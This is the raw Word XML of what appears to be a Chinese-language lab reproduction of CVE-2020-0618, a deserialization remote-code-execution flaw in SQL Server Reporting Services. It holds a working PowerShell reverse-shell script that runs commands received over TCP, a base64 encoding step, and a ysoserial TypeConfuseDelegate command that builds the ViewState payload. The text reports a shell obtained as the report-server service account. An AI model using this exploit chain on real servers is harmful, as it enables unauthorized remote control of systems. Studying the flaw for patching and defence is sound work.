        <w:r w:rsidR="00063634" w:rsidRPr="00063634">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>http://localhost/ReportServer/pages/ReportViewer.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00245775" w:rsidRDefault="00492C9D" w:rsidP="00A8135D">
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00063634" w:rsidRPr="00063634">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Bo</w:t>
        </w:r>
        <w:r w:rsidR="00063634" w:rsidRPr="00063634">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>dy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00063634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中填入键值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r w:rsidRPr="00063634">
        <w:t>NavigationCorrector$PageState</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00063634">
        <w:t xml:space="preserve"> NeedsCorrection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r w:rsidRPr="00063634">
        <w:t>NavigationCorrector$ViewState</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成方式下面会讲述）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r w:rsidRPr="00063634">
        <w:t>__VIEWSTATE</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r w:rsidRPr="00063634">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70E92E1B" wp14:editId="11EFDAF2">
            <wp:extent cx="5274310" cy="20053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05330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Autho</w:t>
      </w:r>
      <w:r>
        <w:t>rization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>TYPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择</w:t>
      </w:r>
      <w:r>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名密码出填入本机用户的用户名和密码</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r w:rsidRPr="00063634">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1312458D" wp14:editId="03090EA1">
            <wp:extent cx="5274310" cy="30676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67685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意此处如果不配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Autho</w:t>
      </w:r>
      <w:r>
        <w:t>rization</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送后会返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>401</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:t>authorized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D"/>
    <w:p w:rsidR="00063634" w:rsidRDefault="00063634" w:rsidP="00A8135D">
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成方式</w:t>
      </w:r>
      <w:r w:rsidR="008A29F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r w:rsidR="008A29F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r w:rsidR="008A29F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="008D42BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依次</w:t>
      </w:r>
      <w:r w:rsidR="008A29F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行如下</w:t>
      </w:r>
      <w:r w:rsidR="008A29F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008A29F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条命令：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A29F0" w:rsidTr="008A29F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>$command = '$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",4343);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2  =$sendback + "PS " + (pwd).Path + "&gt; ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0"/>
          <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0">
            <w:r>
              <w:t>$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0"/>
          <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0">
            <w:r>
              <w:t>$encodedCommand = [Convert]::ToBase64String($bytes)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0"/>
          <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0">
            <w:r>
              <w:t>.\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条命令中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址和端口改为你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听的地址和端口，执行完上述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条命令后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会复制到剪贴板，直接粘贴到上述的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0"/>
    <w:p w:rsidR="008A29F0" w:rsidRDefault="008A29F0" w:rsidP="008A29F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击发送，返回结果如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A29F0" w:rsidRDefault="009D2EFD" w:rsidP="008A29F0">
      <w:r w:rsidRPr="009D2EFD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F559BDF" wp14:editId="153F45D4">
            <wp:extent cx="5274310" cy="2787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7650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B040E" w:rsidRDefault="005B040E" w:rsidP="008A29F0"/>
    <w:p w:rsidR="009D2EFD" w:rsidRDefault="009D2EFD" w:rsidP="008A29F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidR="00667580">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经成功收到反连</w:t>
      </w:r>
      <w:r w:rsidR="00667580">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00667580">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667580" w:rsidRDefault="00667580" w:rsidP="008A29F0">
      <w:r w:rsidRPr="00667580">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1418E173" wp14:editId="6A809202">
            <wp:extent cx="4922947" cy="10745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947" cy="1074513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B040E" w:rsidRDefault="005B040E" w:rsidP="008A29F0"/>
    <w:p w:rsidR="00667580" w:rsidRDefault="00667580" w:rsidP="008A29F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行几个命令，如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667580" w:rsidRDefault="00667580" w:rsidP="008A29F0">
      <w:r w:rsidRPr="00667580">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="706C920B" wp14:editId="75083DCF">
            <wp:extent cx="5014395" cy="13183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4395" cy="1318374"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667580" w:rsidRDefault="00667580" w:rsidP="008A29F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能看到我们已经拿到了</w:t>
      </w:r>
      <w:r>
        <w:t>nt service\reportserver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006609F4" w:rsidRPr="00245775" w:rsidRDefault="006609F4" w:rsidP="0068716B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2508"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C74B36" w:rsidRDefault="00C74B36" w:rsidP="00C74B36">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863EDD" w:rsidRDefault="00492C9D" w:rsidP="00C74B36">
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00C74B36">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://mp.weixin.qq.com/s/ZjZKLMwTW56MPb4Gb229Bg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C74B36" w:rsidRDefault="00492C9D" w:rsidP="00C74B36">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="00C74B36">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/qq_40989258/article/details/105344344</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00863EDD" w:rsidRPr="003D4628" w:rsidRDefault="00863EDD" w:rsidP="00C74B36">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4628">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4628">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4628">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>篇</w:t>
      </w:r>
      <w:r w:rsidR="003D4628" w:rsidRPr="003D4628">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4628">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>是一个人写的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863EDD" w:rsidRDefault="00863EDD" w:rsidP="00C74B36"/>
    <w:p w:rsidR="003D4628" w:rsidRPr="003D4628" w:rsidRDefault="00492C9D" w:rsidP="00C74B36">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="00C74B36">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://github.com/euphrat1ca/CVE-2020-0618</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D4628" w:rsidRPr="003D4628" w:rsidRDefault="00492C9D" w:rsidP="00C74B36">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="00C74B36">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://bbs.pediy.com/thread-257827.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C74B36" w:rsidRDefault="00492C9D" w:rsidP="00C74B36">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="00C74B36">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.anquanke.com/post/id/198945</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00863EDD" w:rsidRDefault="00863EDD" w:rsidP="00C74B36"/>
    <w:p w:rsidR="00667580" w:rsidRPr="00C74B36" w:rsidRDefault="00492C9D" w:rsidP="00C74B36">
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="00667580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F3067B" w:rsidRPr="00A8135D" w:rsidRDefault="003D4628" w:rsidP="00A8135D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>dsec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公司的</w:t>
      </w:r>
      <w:r w:rsidR="00863EDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这篇文章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该是互联网上关于这个漏洞最早的分析文章，也是其他文章的参考源</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F3067B" w:rsidRPr="00A813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4567F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45DA1D72"/>
    <w:lvl w:ilvl="0" w:tplc="7982F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CB2"/>
    <w:rsid w:val="0004080A"/>
    <w:rsid w:val="00057BB0"/>
    <w:rsid w:val="00063634"/>
    <w:rsid w:val="00092E7D"/>
    <w:rsid w:val="000C3B22"/>
    <w:rsid w:val="001D0A0B"/>
    <w:rsid w:val="00206F26"/>
    <w:rsid w:val="00226E1E"/>
    <w:rsid w:val="0023032E"/>
    <w:rsid w:val="00245775"/>
    <w:rsid w:val="00281DDB"/>
    <w:rsid w:val="002C70A1"/>
    <w:rsid w:val="002D0ABB"/>
    <w:rsid w:val="002D0B34"/>
    <w:rsid w:val="00360BDD"/>
    <w:rsid w:val="003A66C8"/>
    <w:rsid w:val="003D4628"/>
    <w:rsid w:val="00437BF1"/>
    <w:rsid w:val="00443CAE"/>
    <w:rsid w:val="00453D8D"/>
    <w:rsid w:val="00456C53"/>
    <w:rsid w:val="00492C9D"/>
    <w:rsid w:val="005101FC"/>
    <w:rsid w:val="005B040E"/>
    <w:rsid w:val="006609F4"/>
    <w:rsid w:val="00667580"/>
    <w:rsid w:val="0068716B"/>
    <w:rsid w:val="006A6F7C"/>
    <w:rsid w:val="006C04EC"/>
    <w:rsid w:val="006F689E"/>
    <w:rsid w:val="00787BC8"/>
    <w:rsid w:val="007D7CF1"/>
    <w:rsid w:val="00860F83"/>
    <w:rsid w:val="00863EDD"/>
    <w:rsid w:val="0086477C"/>
    <w:rsid w:val="008A29F0"/>
    <w:rsid w:val="008D42BD"/>
    <w:rsid w:val="00922A88"/>
    <w:rsid w:val="009252BC"/>
    <w:rsid w:val="009B14DC"/>
    <w:rsid w:val="009D2EFD"/>
    <w:rsid w:val="009D5CB2"/>
    <w:rsid w:val="009E0110"/>
    <w:rsid w:val="009F0C7D"/>
    <w:rsid w:val="00A04326"/>
    <w:rsid w:val="00A37C2C"/>
    <w:rsid w:val="00A8135D"/>
    <w:rsid w:val="00A86506"/>
    <w:rsid w:val="00AB2E6B"/>
    <w:rsid w:val="00BE21A1"/>
    <w:rsid w:val="00C74B36"/>
    <w:rsid w:val="00C952BD"/>
    <w:rsid w:val="00CA6CF1"/>
    <w:rsid w:val="00CD2EE8"/>
    <w:rsid w:val="00CE4C0F"/>
    <w:rsid w:val="00DE4B3C"/>
    <w:rsid w:val="00E37237"/>
    <w:rsid w:val="00E82417"/>
    <w:rsid w:val="00EF2877"/>
    <w:rsid w:val="00F3067B"/>
    <w:rsid w:val="00F35FC7"/>
    <w:rsid w:val="00FD0388"/>
    <w:rsid w:val="00FE2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A08209-3C11-48C8-8CFC-EFEA3AF8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B14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53D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B14DC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E372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A37C2C"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A37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453D8D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00063634"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00092E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5577">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1748454996">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="214465570">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1396392428">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20864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euphrat1ca/CVE-2020-0618"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www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618"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anquanke.com/post/id/198945" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/zh-cn/sql/reporting-services/security/authentication-with-the-report-server?view=sql-server-ver15" 